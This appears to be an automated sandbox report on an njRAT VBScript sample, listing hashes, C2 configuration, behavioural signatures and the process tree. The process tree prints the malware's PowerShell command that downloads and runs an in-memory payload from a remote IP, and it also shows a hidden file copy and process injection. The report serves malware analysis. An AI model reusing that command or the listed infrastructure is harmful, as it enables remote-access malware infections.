Analysis
-
max time kernel
600s -
max time network
600s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26/09/2022, 22:08
Static task
static1
Behavioral task
behavioral1
Sample
RATNJNEW.vbs
Resource
win7-20220812-en
General
-
Target
RATNJNEW.vbs
-
Size
577KB
-
MD5
0673849361f4aa0726bc1e4704c3dc4b
-
SHA1
76acf5375646a1885c361ca1838fa00c8e721ee2
-
SHA256
b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb
-
SHA512
e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9
-
SSDEEP
96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
njrat
0.7NC
NYAN CAT
venomsi.mypsx.net:81
4c6c9a1bbdc34e6ebe
-
reg_key
4c6c9a1bbdc34e6ebe
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1388 powershell.exe 13 1388 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1388 set thread context of 3140 1388 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1388 powershell.exe 1388 powershell.exe 4200 powershell.exe 4200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe Token: SeIncBasePriorityPrivilege 3140 RegAsm.exe Token: 33 3140 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 5056 wrote to memory of 1388 5056 WScript.exe 83 PID 5056 wrote to memory of 1388 5056 WScript.exe 83 PID 1388 wrote to memory of 4200 1388 powershell.exe 85 PID 1388 wrote to memory of 4200 1388 powershell.exe 85 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87 PID 1388 wrote to memory of 3140 1388 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5eedeb218af57d184b7a06908d84e1f4f
SHA1da8c874abd286ac085f7105d3d9da30336b09509
SHA256f514ecbc9a8915c19aab328ecb319f730ddaf6d6d35cbf7b67bcdd00a4a75d80
SHA5123be9e8b318be85f46692414419847147d9be948e0178962e95ce32899c52a6f26ec94e464a69770bc7a212681f24657222eae14646e484b2d0423076784ec29c